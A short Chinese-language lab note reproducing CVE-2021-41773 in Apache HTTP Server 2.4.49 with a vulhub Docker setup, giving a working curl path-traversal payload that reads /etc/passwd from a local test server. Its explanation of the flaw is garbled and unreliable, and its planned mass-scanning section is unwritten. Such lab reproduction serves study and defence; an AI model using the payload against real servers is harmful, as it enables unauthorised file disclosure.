漏洞复现-CVE-2021-41773

漏洞原理

Apache在2.4.49版本中，引入路径体验，该漏洞仅影响具有“要求全部拒绝”访问权限的 Apache HTTP Server 2.4.49 版控制配置禁用。

漏洞危害

可利用漏洞进行远程RCE，访问web服务器上文档根目录之外的任意文件。泄露CGI。

影响版本

Apache HTTPd 2.4.49/2.4.50版本

环境搭建和测试

切换到vulhub/httpd/CVE-2021-41773，启动环境

docker-compose up -d

浏览器访问ip:8080

使用curl发送payload

curl -v --path-as-is http://127.0.0.1:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

批量

明天写

参考文献

shodan新手使用指南
批量